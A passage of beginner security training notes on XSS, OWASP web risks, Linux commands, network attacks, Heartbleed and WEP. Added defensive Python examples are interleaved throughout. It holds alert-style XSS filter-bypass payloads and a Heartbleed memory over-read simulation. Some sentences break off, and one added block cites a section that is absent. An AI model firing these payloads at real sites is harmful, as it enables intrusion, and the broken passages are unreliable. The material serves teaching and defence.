found in roughly 80% of all dynamic websites.

Why XSS occurs: when any website takes any kind of executable input from any
unauthorized visitor, then we can say that website is vulnerable to an XSS attack.

For example: while shopping on Flipkart a user enters <h1>Hacked</h1> in the search
bar, and as he hits search the website interprets the heading tag and executes it on the main
page.

Types of XSS

1. Reflected XSS | Temp. XSS: this XSS only affects a particular user’s browser, hence it will
not remain permanent for the visitors of the website.

Attacks possible: a criminal can add a form on the vulnerable link and send an input form
with details like Name, Credit Card no., Password, PINCODE etc. Yes, if the vulnerability is
on a banking website.

2. Stored XSS | Permanent XSS: if the input field is attached to the database then we can
say that it’s a stored XSS.

For example: a hacker inputs malicious JavaScript code to steal the cookies of all the
visitors of the website who visit for online shopping or banking etc. It can be worse via a
keylogger too.
Requirements
--------------
1. Basics of HTML
2. Basics of JAVA SCRIPT
3. DVWA: Reflected + Stored (Low + Medium)

Validation Bypass Payload


></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
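The JavaScript, cookie-stealing and XSS sections above all come down to one server-side omission: user text is written into the page without output encoding. The following is an added Python example, not code from the page or from DVWA, of the two controls that close that gap: HTML-escaping user text before it is placed in the page (so the `<h1>Hacked</h1>` search and the two validation-bypass payloads render as visible text), and issuing the session cookie with `HttpOnly` so `document.cookie` cannot read it even if a script does run. The payload strings are copied from the page and kept as inert data; the cookie name and flags are constructed for the example.

```python
import html
import secrets


def escape_user_text(text):
    """Output encoding for an HTML text node or a double-quoted attribute value:
    < > & " ' become entities, so the browser shows characters, never markup."""
    return html.escape(text, quote=True)


def render_search_vulnerable(term):
    """The Flipkart-style bug from the page: input pasted straight into the HTML."""
    return "<p>Results for: " + term + "</p>"


def render_search_hardened(term):
    return "<p>Results for: " + escape_user_text(term) + "</p>"


def render_input_hardened(value):
    """Inside an attribute the value must be quoted AND escaped; one without the other fails."""
    return '<input name="q" value="' + escape_user_text(value) + '">'


def session_cookie_header(secure=True):
    """Set-Cookie line for a fresh session id. HttpOnly keeps document.cookie from reading
    it; Secure keeps it off plain HTTP; SameSite=Lax limits cross-site sending."""
    session_id = secrets.token_urlsafe(32)      # 256 bits of randomness, unguessable
    flags = ["HttpOnly", "SameSite=Lax", "Path=/"]
    if secure:
        flags.append("Secure")
    return "Set-Cookie: session=" + session_id + "; " + "; ".join(flags)


# Payloads from the XSS section, kept here only as plain strings.
PAYLOADS = [
    "<h1>Hacked</h1>",
    "<script>alert(document.cookie)</script>",
    "></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>",
    '<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>',
]


def all_payloads_inert(payloads=PAYLOADS):
    """True when no escaped payload can still open a tag or break out of a quoted attribute."""
    return all("<" not in escape_user_text(p) and '"' not in escape_user_text(p)
               for p in payloads)


if __name__ == "__main__":
    print(render_search_vulnerable("<h1>Hacked</h1>"))
    print(render_search_hardened("<h1>Hacked</h1>"))
    print(render_input_hardened(PAYLOADS[2]))
    print(session_cookie_header())
    print(all_payloads_inert())
```

Escaping is context-specific: the entity encoding here is right for HTML text and quoted attributes, but a value placed inside a JavaScript string, a URL or a CSS rule needs that context's own encoder, and the client-side validation the JavaScript section mentions is no substitute, since the request can be sent without the page's script.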

Broken Authentication Session Management


Application functions related to authentication and session management are often not
implemented correctly, allowing attackers to compromise passwords, keys, or session
tokens, or to exploit other implementation flaws to assume other users’ identities.

Source

Cross-Site Request Forgery


A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request,
including the victim’s session cookie and any other automatically included
authentication information, to a vulnerable web application. This allows the attacker to
force the victim’s browser to generate requests the vulnerable application thinks are
legitimate requests from the victim.

Source
Missing Functional Level Access Control
Most web applications verify function level access rights before making that
functionality visible in the UI. However, applications need to perform the same access
control checks on the server when each function is accessed. If requests are not verified,
attackers will be able to forge requests in order to access functionality without proper
authorization.
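The Insecure Direct Object Reference item near the top of this part and the Missing Function Level Access Control item here are the two halves of server-side authorization: the function check asks "may this role call this handler at all?", the object check asks "does this particular record belong to the caller?". The following is an added Python example, not code from the page or from OWASP, that applies both checks on every call, with constructed users, roles and invoices. Answering "not yours" and "does not exist" identically is deliberate, so changing the id in the URL reveals nothing about which ids exist.

```python
# Constructed sample data: two ordinary users, one admin, two invoices.
USERS = {"alice": "user", "bob": "user", "carol": "admin"}
INVOICES = {101: {"owner": "alice", "total": 50}, 102: {"owner": "bob", "total": 75}}

# Function-level rule: which roles may call which function at all.
PERMISSIONS = {"view_invoice": {"user", "admin"}, "delete_user": {"admin"}}


class Forbidden(Exception):
    """Raised for every authorization failure; the HTTP layer maps it to one response."""


def check_function_access(actor, function):
    """Missing Function Level Access Control fix: the server checks the role on every
    call, not only when deciding whether to show the menu entry in the UI."""
    role = USERS.get(actor)
    if role is None or role not in PERMISSIONS.get(function, set()):
        raise Forbidden("%s may not call %s" % (actor, function))
    return role


def view_invoice(actor, invoice_id):
    """IDOR fix: after the function check, the record itself must belong to the caller."""
    role = check_function_access(actor, "view_invoice")
    invoice = INVOICES.get(invoice_id)
    # 'not yours' and 'does not exist' get the same answer, so ids cannot be enumerated.
    if invoice is None or (invoice["owner"] != actor and role != "admin"):
        raise Forbidden("invoice %s not available to %s" % (invoice_id, actor))
    return invoice


def delete_user(actor, target):
    """Admin-only function; a hidden menu entry is not what protects it."""
    check_function_access(actor, "delete_user")
    return USERS.pop(target, None) is not None


def allowed(fn, *args):
    """Helper for callers that only need a yes/no."""
    try:
        fn(*args)
    except Forbidden:
        return False
    return True


if __name__ == "__main__":
    print(allowed(view_invoice, "alice", 101))   # own record
    print(allowed(view_invoice, "alice", 102))   # bob's record, id changed in the URL
    print(allowed(delete_user, "bob", "alice"))  # function hidden in UI, still must be denied
```

In a real application the ownership test would be part of the database query (`WHERE id = ? AND owner = ?`) rather than a check after fetching, which also removes the temptation to skip it on a hot path.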

Source

Unvalidated Redirects And Forwards


Web applications frequently redirect and forward users to other pages and websites,
and use untrusted data to determine the destination pages. Without proper validation,
attackers can redirect victims to phishing or malware sites, or use forwards to access
unauthorized pages.

HTTP response splitting


HTTP response splitting is a form of web application vulnerability, resulting from the
failure of the application or its environment to properly sanitize input values. It can be
used to perform cross-site scripting attacks, cross-user defacement, web cache
poisoning, and similar exploits.
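The redirect item and the response-splitting item above fail at the same place: a visitor-controlled value ends up in a response header. The following is an added Python example, not code from the page or from OWASP, of a `Location` value validator that rejects CR/LF (the splitting vector), allows only an absolute path on the same site or an absolute URL to a host on an allow-list, and falls back to the home page otherwise. The trusted host names are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed: hosts this application is willing to send visitors to.
TRUSTED_HOSTS = {"www.example-bank.invalid", "help.example-bank.invalid"}


def header_value(value):
    """HTTP response splitting fix: a header value may never contain CR or LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value


def safe_location(target):
    """Unvalidated redirect fix: only a local path or a trusted absolute URL survives."""
    target = header_value(target)
    if "\\" in target:                       # browsers treat '\' like '/' in URLs
        raise ValueError("backslash in redirect target")
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative target: must be an absolute path, and '//host' is not one.
        if target.startswith("/") and not target.startswith("//"):
            return target
        raise ValueError("relative target must be an absolute path")
    # Absolute target: http(s) only, and the host (not the userinfo) must be trusted.
    if parts.scheme in ("http", "https") and parts.hostname in TRUSTED_HOSTS:
        return target
    raise ValueError("redirect to untrusted destination: " + target)


def is_safe_target(target):
    try:
        safe_location(target)
    except ValueError:
        return False
    return True


def redirect_headers(target):
    """Headers for a 302 to a validated target, or to the home page when validation fails."""
    try:
        location = safe_location(target)
    except ValueError:
        location = "/"
    return [("Location", location)]


if __name__ == "__main__":
    for t in ["/account", "https://www.example-bank.invalid/x", "http://phish.invalid/",
              "//phish.invalid/", "/x\r\nSet-Cookie: a=b", "javascript:alert(1)"]:
        print(repr(t), "->", redirect_headers(t))
```

The `hostname` property is compared rather than the raw `netloc`, so `http://www.example-bank.invalid@phish.invalid/` is rejected: the trusted name there is only the userinfo part.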

Source
LINUX BASICS

1.Command: ls
The command “ls” stands for List Directory Contents: it lists the contents of the folder it
is run from, be they files or folders.

root@tecmint:~# ls

Android-Games Music

Pictures Public

Desktop Tecmint.com

Documents TecMint-Sync

Downloads Templates

The command “ls -l” lists the content of the folder in long listing fashion.

root@tecmint:~# ls -l

total 40588

drwxrwxr-x 2 ravisaive ravisaive 4096 May  8 01:06 Android Games

drwxr-xr-x 2 ravisaive ravisaive 4096 May 15 10:50 Desktop

drwxr-xr-x 2 ravisaive ravisaive 4096 May 16 16:45 Documents

drwxr-xr-x 6 ravisaive ravisaive 4096 May 16 14:34 Downloads

drwxr-xr-x 2 ravisaive ravisaive 4096 Apr 30 20:50 Music

drwxr-xr-x 2 ravisaive ravisaive 4096 May  9 17:54 Pictures

drwxrwxr-x 5 ravisaive ravisaive 4096 May  3 18:44 Tecmint.com

drwxr-xr-x 2 ravisaive ravisaive 4096 Apr 30 20:50 Templates

Command “ls -a“, list the content of folder, including hidden files starting with ‘.’.

root@tecmint:~# ls -a

.                     .gnupg            .dbus             .goutputstream-PI5VVW  .mission-control
.adobe                deja-dup          .grsync           .mozilla               .themes
.gstreamer-0.10       .mtpaint          .thumbnails       .gtk-bookmarks         .thunderbird
.HotShots             .mysql_history    .htaccess         .apport-ignore.xml     .ICEauthority
.profile              .bash_history     .icons            .bash_logout           .fbmessenger
.jedit                .pulse            .bashrc           .liferea_1.8           .pulse-cookie
.Xauthority           .gconf            .local            .Xauthority.HGHVWW     .cache
.gftp                 .macromedia       .remmina          .cinnamon              .gimp-2.8
.ssh                  .xsession-errors  .compiz           .gnome                 teamviewer_linux.deb
.xsession-errors.old  .config           .gnome2           .zoncolor

2.Command: lsblk
The “lsblk” stands for (List Block Devices), print block devices by their assigned name
(but not RAM) on the standard output in a tree-like fashion.

root@tecmint:~# lsblk

NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT

sda 8:0 0 232.9G 0 disk

├─sda1 8:1 0 46.6G 0 part /

├─sda2 8:2 0 1K 0 part

├─sda5 8:5 0 190M 0 part /boot

├─sda6 8:6 0 3.7G 0 part [SWAP]

├─sda7 8:7 0 93.1G 0 part /data

└─sda8 8:8 0 89.2G 0 part /personal

sr0 11:0 1 1024M 0 rom

The “lsblk -l” command list block devices in ‘list‘ structure (not tree like fashion).

root@tecmint:~# lsblk -l
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT

sda 8:0 0 232.9G 0 disk

sda1 8:1 0 46.6G 0 part /

sda2 8:2 0 1K 0 part

sda5 8:5 0 190M 0 part /boot

sda6 8:6 0 3.7G 0 part [SWAP]

sda7 8:7 0 93.1G 0 part /data

sda8 8:8 0 89.2G 0 part /personal

sr0 11:0 1 1024M 0 rom

Note: lsblk is very useful and easiest way to know the name of New Usb Device you just
plugged in, especially when you have to deal with disk/blocks in terminal.
3.Command: md5sum
The “md5sum” stands for (Compute and Check MD5 Message Digest), md5 checksum
(commonly called hash) is used to match or verify integrity of files that may have
changed as a result of a faulty file transfer, a disk error or non-malicious interference.

root@tecmint:~# md5sum teamviewer_linux.deb


47790ed345a7b7970fc1f2ac50c97002 teamviewer_linux.deb

Note: The user can match the generated md5sum with the one provided officially.
Md5sum is considered less secure than sha1sum, which we will discuss later.
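The note above describes matching the digest you computed against the one published by the vendor. The following is an added Python example, not the page's own code and not the coreutils implementation, of that check done programmatically: the file is hashed in chunks so a large .deb or .iso never has to fit in memory, the published hex string is normalised, and the comparison is constant-time. It goes slightly beyond the page by taking the algorithm as a parameter, since sha256 is the digest most vendors publish today; the sample byte strings in the test are constructed.

```python
import hashlib
import hmac


def digest_bytes(data, algorithm="md5"):
    """Hex digest of an in-memory byte string (md5, sha1, sha256, ...)."""
    return hashlib.new(algorithm, data).hexdigest()


def digest_file(path, algorithm="md5", chunk=1 << 20):
    """Stream the file in 1 MiB chunks so the whole download is never held in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_bytes(data, expected_hex, algorithm="md5"):
    """Compare the computed digest with the published one in constant time."""
    return hmac.compare_digest(digest_bytes(data, algorithm), expected_hex.strip().lower())


def verify_file(path, expected_hex, algorithm="md5"):
    """Same check for a file on disk, e.g. the teamviewer_linux.deb from the page."""
    return hmac.compare_digest(digest_file(path, algorithm), expected_hex.strip().lower())


if __name__ == "__main__":
    import sys
    # Usage: python check.py <file> <published-hex> [algorithm]
    path, expected = sys.argv[1], sys.argv[2]
    algorithm = sys.argv[3] if len(sys.argv) > 3 else "md5"
    print("OK" if verify_file(path, expected, algorithm) else "MISMATCH")
```

A digest fetched from the same server as the download only detects corruption in transit; against a tampered server it proves nothing, which is why distributions additionally sign their checksum files.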

4.Command: dd
Command “dd” stands for Convert and Copy a file. It can be used to convert and copy a
file and most of the time is used to copy an iso file (or any other file) to a USB device (or
any other location), and thus can be used to make a bootable USB stick.

root@tecmint:~# dd if=/home/user/Downloads/debian.iso of=/dev/sdb1 bs=512M; sync

Note: In the above example the usb device is supposed to be sdb1 (You should Verify it
using command lsblk, otherwise you will overwrite your disk and OS), use name of disk
very Cautiously!!!.
dd command takes some time ranging from a few seconds to several minutes in
execution, depending on the size and type of file and read and write speed of Usb stick.
5.Command: uname
The “uname” command stands for (Unix Name), print detailed information about the
machine name, Operating System and Kernel.

root@tecmint:~# uname -a

Linux tecmint 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:36:13 UTC 2013 i686 i686 i686 GNU/Linux
Note: uname shows the type of kernel; uname -a outputs detailed information. Elaborating
the above output of uname -a:
1. “Linux“: The machine’s kernel name.
2. “tecmint“: The machine’s node name.
3. “3.8.0-19-generic“: The kernel release.
4. “#30-Ubuntu SMP“: The kernel version.
5. “i686“: The architecture of the processor.
6. “GNU/Linux“: The operating system name.
6.Command: history
The “history” command stands for History (Event) Record, it prints the history of long
list of executed commands in terminal.

root@tecmint:~# history

1 sudo add-apt-repository ppa:tualatrix/ppa

2 sudo apt-get update

3 sudo apt-get install ubuntu-tweak

4 sudo add-apt-repository ppa:diesch/testing

5 sudo apt-get update

6 sudo apt-get install indicator-privacy

7 sudo add-apt-repository ppa:atareao/atareao

8 sudo apt-get update


9 sudo apt-get install my-weather-indicator

10 pwd

11 cd && sudo cp -r unity/6 /usr/share/unity/

12 cd /usr/share/unity/icons/

13 cd /usr/share/unity

Note: Pressing “Ctrl + R” and then search for already executed commands which lets
your command to be completed with auto completion feature.

(reverse-i-search)`if': ifconfig

7.Command: mkdir

The “mkdir” (Make Directory) command creates a new directory with the given name or
path. However, if the directory already exists, it returns an error message saying that
the directory cannot be created because it already exists.

root@tecmint:~# mkdir tecmint

mkdir: cannot create directory `tecmint‘: File exists

Note: a directory can only be created inside a folder in which the user has write
permission. (Don’t be confused by "File" in the above output; you might remember what I
said at the beginning: in Linux every file, folder, drive, command and script is treated
as a file.)

8.Command: touch
The “touch” command stands for (Update the access and modification times of
each FILE to the current time).touch command creates the file, only if it doesn’t exist. If
the file already exists it will update the timestamp and not the contents of the file.

root@tecmint:~# touch tecmintfile

Note: touch can be used to create a file under a directory on which the user has write
permission, only if the file doesn’t exist there.

9.Command: chmod

The Linux “chmod” command stands for (change file mode bits). chmod changes the file
mode (permission) of each given file, folder, script, etc.. according to mode asked for.
There exist 3 types of permission on a file (folder or anything but to keep things simple
we will be using file).

Read (r)=4

Write(w)=2

Execute(x)=1

So if you want to give only read permission on a file it will be assigned a value of ‘4‘, for
write permission only, a value of ‘2‘, and for execute permission only, a value of ‘1‘ is to
be given. For read and write permission 4+2 = ‘6‘ is to be given, and so on.
Now permissions need to be set for 3 kinds of user: the first is the owner,
then the user group and finally the world.

rwxr-x--x abc.sh
Here the owner’s (root’s) permission is rwx (read, write and execute), the
user group to which it belongs has r-x (read and execute only, no write permission) and
the world has --x (only execute).
To change its permission and provide read, write and execute permission to owner,
group and world:

root@tecmint:~# chmod 777 abc.sh

Only read and write permission to all three.

root@tecmint:~# chmod 666 abc.sh

Read, write and execute to owner and only execute to group and world.

root@tecmint:~# chmod 711 abc.sh

Note: this is one of the most important commands, useful for sysadmins and users alike. In a
multi-user environment or on a server this command comes to the rescue: setting the wrong
permission will either make a file inaccessible or provide unauthorized access to
someone.
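The arithmetic in the chmod section (r=4, w=2, x=1, summed per owner/group/world) is easy to get wrong by hand, and the note warns that the wrong number either locks a file away or opens it to everyone. The following is an added Python example, not the page's code and not part of coreutils, that converts between the `rwxr-x--x` form shown in `ls -l` and the three octal digits chmod takes, and flags the two mistakes the note describes. The mode strings in the test are constructed.

```python
# Bit weights for each position in one rwx triplet, as the page gives them.
WEIGHTS = (("r", 4), ("w", 2), ("x", 1))


def symbolic_to_octal(mode):
    """'rwxr-x--x' -> '751' (owner, group, world)."""
    if len(mode) != 9:
        raise ValueError("expected nine permission characters")
    digits = []
    for start in range(0, 9, 3):
        value = 0
        for ch, (letter, weight) in zip(mode[start:start + 3], WEIGHTS):
            if ch == letter:
                value += weight            # r adds 4, w adds 2, x adds 1
            elif ch != "-":
                raise ValueError("unexpected character %r" % ch)
        digits.append(str(value))
    return "".join(digits)


def octal_to_symbolic(octal):
    """'666' -> 'rw-rw-rw-'."""
    if len(octal) != 3 or any(c not in "01234567" for c in octal):
        raise ValueError("expected three octal digits")
    out = []
    for digit in octal:
        value = int(digit)
        out.append("".join(letter if value & weight else "-" for letter, weight in WEIGHTS))
    return "".join(out)


def risky_modes(mode):
    """The two mistakes from the chmod note: open to everyone, or unusable by the owner."""
    problems = []
    if mode[7] == "w":
        problems.append("world-writable")      # anyone on the box can edit the file
    if mode[0] != "r":
        problems.append("owner cannot read")   # the file is inaccessible to its own owner
    return problems


if __name__ == "__main__":
    for octal in ("777", "666", "711", "751"):
        sym = octal_to_symbolic(octal)
        print(octal, sym, symbolic_to_octal(sym), risky_modes(sym))
```

For a script such as abc.sh, 751 gives the owner full control and lets the group and others run it without reading or editing it; 777 from the page's first example is the setting the note warns about.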

10.Command: apt

The Debian-based “apt” command stands for Advanced Package Tool. Apt is an
advanced package manager for Debian-based systems (Ubuntu, Kubuntu, etc.) that
automatically and intelligently searches, installs, updates and resolves dependencies of
packages on a GNU/Linux system from the command line.
root@tecmint:~# apt-get install mplayer

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following package was automatically installed and is no longer required:

java-wrappers

Use 'apt-get autoremove' to remove it.

The following extra packages will be installed:

esound-common libaudiofile1 libesd0 libopenal-data libopenal1 libsvga1 libvdpau1 libxvidcore4

Suggested packages:

pulseaudio-esound-compat libroar-compat2 nvidia-vdpau-driver vdpau-driver mplayer-doc netselect fping

The following NEW packages will be installed:

esound-common libaudiofile1 libesd0 libopenal-data libopenal1 libsvga1 libvdpau1 libxvidcore4 mplayer

0 upgraded, 9 newly installed, 0 to remove and 8 not upgraded.

Need to get 3,567 kB of archives.

After this operation, 7,772 kB of additional disk space will be used.

Do you want to continue [Y/n]? y


root@tecmint:~# apt-get update

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Get:1 http://security.ubuntu.com raring-security Release.gpg [933 B]

Hit http://in.archive.ubuntu.com raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Get:2 http://security.ubuntu.com raring-security Release [40.8 kB]

Ign http://ppa.launchpad.net raring Release.gpg

Get:3 http://in.archive.ubuntu.com raring-updates Release.gpg [933 B]

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://in.archive.ubuntu.com raring-backports Release.gpg

Note: The above commands result in system-wide changes and hence require the root password (check for ‘#’ and not
‘$’ as the prompt). Apt is considered more advanced and intelligent as compared to the yum command.

As the name suggests, apt-cache search looks for packages containing the sub-package mplayer. apt-get install/update
updates all the packages that are already installed to the newest version.

Read more about apt-get and apt-cache commands at 25 APT-GET and APT-CACHE Commands.
(source: www.tecmint.com)

Introduction to Network Security

Network Security is the process of securing a network in such a way that no
unauthorized person can do harm to it. The basic purpose of securing a network
is to protect the data of the systems on it. Network Security is a level of
guarantee that all machines in a network are working properly and in a secure way. Network
Security consists of various policies to prevent and monitor unauthorized access,
misuse, modification or denial of computer peripherals. Network Security involves
authorizing legitimate users to access data in a network, which is controlled by the
Network Administrator.

Basics of Networking
Routers
Switches
Internet
Intranet
Network- LAN, MAN, WAN
Terminologies
Star, Ring, Bus, Mesh.
IP- Public Private
Default Gateways

Basic Network Scanning

Nmap
Advanced IP Scanner

Introduction to Wireless Networking

Wireless networks come into play when running a physical (wired) network becomes
troublesome, for example in a mesh network. A physical network is difficult to maintain and
expensive, as various physical media are required to establish connections with end users.
Physical media include switches, hubs, cables, connections, maintenance, etc.

The IEEE standards body came up with a wireless networking technique known as Wi-Fi.

Wi-Fi – Wireless Fidelity

It is put into practice via a router with DHCP built in. The first company to
come out with such a wireless router: D-Link.

Initially this created a problem for network administrators maintaining their networks, as
any person could connect to the network without any authentication process, so it
was less secure compared to a physical network.

So security authentication comes into action:

WEP – Wired Equivalent Privacy

WPA – Wi-Fi Protected Access

WPA2 – Wi-Fi Protected Access with AES/CCMP

AES – Advanced Encryption Standard

WEP stands for Wired Equivalent Privacy.

• It is 802.11's first hardware form of security where the user and

• Encryption key of either 64 bits or 128 bits in HEX.

• Challenge Key for User to authenticate

WPA stands for Wi-Fi Protected Access.

• It builds upon WEP to make it more secure by adding extra security mechanisms
and algorithms to stop unauthorized access.

• WPA delivers a level of security way beyond anything that WEP can offer.

• It's a new security standard adopted by the Wi-Fi Alliance.

WPA2 – Wi-Fi Protected Access with AES

• The primary difference between WPA and WPA2 is that WPA2 uses a more
advanced encryption technique called AES (Advanced Encryption Standard).

• We prefer WPA2 because it has more than three protection levels, making it
nearly impossible for even expert hackers to break the encryption.

• AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based
upon the Institute for Electrical and Electronics Engineers’ (IEEE)

Basic Terms for Wireless Networks

1. Access Point (AP)
2. Clients
3. Broadcasting
4. Beacon Packets
5. Data Packets
6. IVs
7. ESSID
8. BSSID
9. Channels
10. Authentication
11. Deauthentication
12. Association
13. Interfaces

Network Attacks

• DoS Attack
• Brute Force Attack
• Network Sniffing
• Botnet Attack

ARP Poisoning
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a
technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP)
messages onto a local area network. Generally, the aim is to associate the attacker's
MAC address with the IP address of another host, such as the default gateway, causing
any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the
traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such
as denial of service, man in the middle, or session hijacking attacks.

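As an added example (not from the original document), a small Python monitor that applies the definition above to a constructed list of ARP replies and flags an IP address advertised by more than one MAC, one MAC claiming several IPs, and a change in the gateway's MAC; all addresses are made up:

```python
# Added example (not from the original document): flag ARP cache poisoning
# symptoms in a constructed list of ARP "is-at" replies; no live capture needed.
from collections import defaultdict

# Constructed sample: (sender IP, sender MAC). aa:bb:cc:dd:ee:01 is the genuine
# gateway; de:ad:be:ef:00:01 is the attacker's MAC, which starts claiming the
# gateway's IP (and later another host's IP) part-way through the stream.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ("192.168.1.20", "aa:bb:cc:dd:ee:20"),
    ("192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ("192.168.1.1", "DE:AD:BE:EF:00:01"),   # spoofed reply for the gateway IP
    ("192.168.1.20", "aa:bb:cc:dd:ee:20"),
    ("192.168.1.1", "de:ad:be:ef:00:01"),
    ("192.168.1.30", "de:ad:be:ef:00:01"),  # the same MAC now also "is" .30
]


def detect_arp_spoofing(replies, gateway_ip):
    """Report suspicious IP<->MAC bindings seen in `replies`.

    Assumes the first MAC seen for an IP is genuine; a real monitor would use
    a static baseline such as a DHCP lease table instead.
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    first_mac = {}
    for ip, mac in replies:
        mac = mac.lower()  # normalise case so one MAC is not counted twice
        first_mac.setdefault(ip, mac)
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    # Core symptom: one IP address advertised by several MAC addresses.
    conflicts = {ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1}
    # One MAC claiming several IPs: the attacker impersonating multiple hosts.
    multi_ip_macs = {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > 1}
    # Highest-value target: has the default gateway's MAC changed?
    gateway_macs = ip_to_macs.get(gateway_ip, set())
    suspect_macs = sorted(m for m in gateway_macs if m != first_mac.get(gateway_ip))
    return {
        "conflicts": conflicts,
        "multi_ip_macs": multi_ip_macs,
        "gateway_changed": len(gateway_macs) > 1,
        "suspect_macs": suspect_macs,
    }


if __name__ == "__main__":
    print(detect_arp_spoofing(SAMPLE_ARP_REPLIES, "192.168.1.1"))
```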

SSL Stripping
Heartbleed

The Vulnerable Heart of the Internet, i.e. SSL

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic
software library. This weakness allows stealing the information protected, under normal
conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides
communication security and privacy over the Internet for applications such as web,
email, instant messaging (IM) and some virtual private networks (VPNs).

The Heartbleed bug allows anyone on the Internet to read the memory of the systems
protected by the vulnerable versions of the OpenSSL software. This compromises the
secret keys used to identify the service providers and to encrypt the traffic, the names
and passwords of the users and the actual content. This allows attackers to eavesdrop
on communications, steal data directly from the services and users and to impersonate
services and users.
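An added example, not the document's or OpenSSL's own code, that simulates the heartbeat handling behind the bug: the pre-fix handler trusts the sender's payload_length field, while the post-fix handler applies the bounds check the patch added; the memory buffer and the secret lying next to the record are constructed:

```python
# Added example (not from the original document or OpenSSL's code): a minimal
# simulation of the TLS heartbeat record handling behind Heartbleed. The
# "memory" buffer and the adjacent secret are constructed, not read from a process.
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
PADDING_LEN = 16  # RFC 6520 requires at least 16 bytes of random padding

# Constructed stand-in for whatever happens to sit after the record in the heap.
ADJACENT_MEMORY = b"user=alice;session=CONSTRUCTED_SECRET_TOKEN;"


def build_heartbeat(payload, claimed_length=None):
    """Heartbeat message: type (1 byte) | payload_length (2 bytes) | payload | padding.
    `claimed_length` lets the sender state a length that does not match the payload."""
    if claimed_length is None:
        claimed_length = len(payload)
    header = bytes([HEARTBEAT_REQUEST]) + struct.pack(">H", claimed_length)
    return header + payload + b"\x00" * PADDING_LEN


def vulnerable_respond(memory):
    """Pre-fix logic: trusts the sender's payload_length and copies that many bytes
    starting at the payload, so a large value runs off the end of the record."""
    claimed = struct.unpack(">H", memory[1:3])[0]
    return bytes([HEARTBEAT_RESPONSE]) + memory[1:3] + bytes(memory[3:3 + claimed])


def fixed_respond(memory, record_len):
    """Post-fix logic (the bounds check OpenSSL 1.0.1g added): discard the record
    unless type + length + payload + padding all fit inside what was received."""
    if 1 + 2 + PADDING_LEN > record_len:
        return None
    claimed = struct.unpack(">H", memory[1:3])[0]
    if 1 + 2 + claimed + PADDING_LEN > record_len:
        return None  # silently discard, per RFC 6520 section 4
    return bytes([HEARTBEAT_RESPONSE]) + memory[1:3] + bytes(memory[3:3 + claimed])


def simulate(claimed_length, payload=b"hello"):
    """Return (payload echoed by the unpatched code, response from the patched code)."""
    record = build_heartbeat(payload, claimed_length)
    memory = record + ADJACENT_MEMORY  # the record as it lies in the process heap
    leaked = vulnerable_respond(memory)[3:]  # Python slicing stops at the buffer end
    return leaked, fixed_respond(memory, len(record))
```

With an honest length the two handlers agree; with an oversized one the unpatched handler echoes the bytes beyond the record while the patched one returns nothing.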

Shellshock
“Shellshock” refers to vulnerabilities found in Bash, a common command-line shell for
Linux and Unix systems.

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix
Bash shell, the first of which was disclosed on 24 September 2014.

It can allow an attacker to gain unauthorized access to a computer system.

• CVE-2014-6277,

• CVE-2014-6278,

• CVE-2014-7169,

• CVE-2014-7186, and

• CVE-2014-7187

Capture Wireless Communication Packets

Packets are captured by sitting between the AP and its users; this can be done in two ways,
i.e. with a GUI or a CLI based application.

For the GUI we can use the Wireshark packet capturing tool, which is available for Windows and Linux
operating systems.

For the CLI, a tool called airodump is used, which is built into Kali Linux.

# Configuring the Wireless Card

# Wireshark Capturing

# Filtering

# Airodump
WEP – Wired Equivalent Privacy (1997)

The flaws in WEP make it susceptible to various statistical cracking techniques. WEP
uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) be random.
The implementation of RC4 in WEP repeats that IV about every

• If enough IVs can be captured, the key can be deciphered/decrypted!
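An added example (not from the original document) that quantifies the IV problem with the birthday bound for a 24-bit IV, parses the WEP header of a frame body, and checks a constructed set of frames for IV reuse, the condition a wireless IDS should alert on:

```python
# Added example (not from the original document): why WEP's 24-bit IV is too
# small, plus an IV-reuse check over a constructed list of WEP frame bodies.
import math

IV_BITS = 24             # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 2 ** IV_BITS  # 16,777,216 possible IVs


def frames_until_reuse(probability, bits=IV_BITS):
    """Birthday bound: number of frames after which the chance that some IV has
    already repeated is at least `probability`, n ~ sqrt(2 N ln(1 / (1 - p)))."""
    n = 2 ** bits
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - probability))))


def extract_iv(wep_body):
    """Parse the 4-byte WEP header at the start of a frame body: 3 IV octets
    followed by one octet whose top two bits hold the key index."""
    if len(wep_body) < 4:
        raise ValueError("frame body too short for a WEP header")
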